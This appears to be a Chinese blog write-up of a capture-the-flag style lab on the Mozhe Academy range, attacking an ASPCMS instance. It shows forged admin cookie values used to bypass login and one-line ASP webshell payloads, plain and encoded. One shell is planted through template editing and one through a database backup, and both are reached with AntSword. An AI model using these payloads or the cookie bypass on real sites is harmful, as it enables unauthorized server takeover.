TypechoJoeTheme

mmzkyl

墨者学院靶场_CMS系统漏洞分析溯源(第4题)

mmzkyl博主
2021-11-09
/
0 评论
/
254 阅读
/
494 个字
/
百度已收录
11/09
本文最后更新于2021年11月10日,已超过194天没有更新。如果文章内容或图片资源失效,请留言反馈,我会及时处理,谢谢!

随笔

  • 2021-11-09 19:41
    使用burp suite抓包修改Cookie,老是显示连接超时,最后只能使用Firefox的插件来修改Cookie
  • 2021-11-09 20:04
    通过修改模板是能够getshell的,尝试一下通过数据库备份能否getshell
  • 2021-11-09 20:20
    通过数据库备份也是能够进行getshell的,就是这个编码我也是有点搞不懂
    ┼攠數畣整爠煥敵瑳∨≡┩愾 <% execute request("a")%>
  • 2021-11-09 20:23
    上面那个变形的一句话木马是我以前遇到过的,没想到放在这里也能成功运行(原链接

目标靶场



解题步骤

  • 进入首页
  • 一眼就知道这个CMS是ASPCMS(写这么大,生怕别人看不到),不过先不去查找该CMS漏洞,先怼一波登录框试试
  • 先尝试弱口令(这个验证码似乎能够重用),暴力破解一波密码
  • 也不存在SQL注入
  • 查一下ASPCMS曾经爆出来的漏洞
  • 尝试访问 home.asp 界面
  • 修改Cookie后,再次尝试访问 home.asp 界面
    username=admin ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG LanguageAlias=cn LanguagePath=%2F languageID=1 adminId=1 adminName=admin groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9 GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9
  • 此时通过修改Cookie直接进入到ASPCMS的后台之中,接下来便是寻找能够getshell的点位了
  • 看一下服务器信息
  • 此系统能够编辑界面风格,一般来说能够直接编辑界面风格都能够直接修改界面代码,从而直接插入一句话木马
  • 进入界面风格,编辑模板
  • 其实后台已经存在一个一句话木马文件了(不是我创建的)
  • 测试发现该一句话木马能够正常使用,不过我还是通过添加模板自己再新创建一个一句话木马吧
    <%eval request("mmzkyl")%>
  • 创建成功,尝试使用蚁剑进行连接
  • 连接成功,寻找相应Key提交即可

数据库备份进行getshell

  • 进入内容维护界面,修改单篇文章
  • 插入一句话木马
    ┼攠數畣整爠煥敵瑳∨≡┩愾
  • 进入数据库备份页面,进行数据库备份
  • 访问数据库备份文件
  • 尝试使用蚁剑进行连接
  • 连接成功
赞(1)
评论 (0)

互动读者

  • เว็บแท่งหวยออนไลน์闲逛

    评论 1 次 | 文章 0 篇

  • slot terbaru闲逛

    评论 1 次 | 文章 0 篇

  • mobil odeme bozum闲逛

    评论 1 次 | 文章 0 篇

  • nmqberxi闲逛

    评论 1 次 | 文章 0 篇

标签云